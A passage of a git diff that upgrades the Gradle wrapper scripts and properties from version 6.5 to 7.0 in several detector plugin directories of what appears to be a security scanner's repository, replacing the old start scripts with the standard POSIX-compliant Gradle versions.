+APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/docker/gradlew.bat b/google/detectors/exposedui/docker/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/docker/gradlew.bat +++ b/google/detectors/exposedui/docker/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/drupal_install/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/drupal_install/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/google/detectors/exposedui/drupal_install/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/drupal_install/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME 
diff --git a/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/elasticsearch/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/elasticsearch/gradlew b/google/detectors/exposedui/elasticsearch/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/elasticsearch/gradlew +++ b/google/detectors/exposedui/elasticsearch/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/elasticsearch/gradlew.bat b/google/detectors/exposedui/elasticsearch/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/elasticsearch/gradlew.bat +++ b/google/detectors/exposedui/elasticsearch/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/hadoop/yarn/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/hadoop/yarn/gradlew b/google/detectors/exposedui/hadoop/yarn/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/hadoop/yarn/gradlew +++ b/google/detectors/exposedui/hadoop/yarn/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
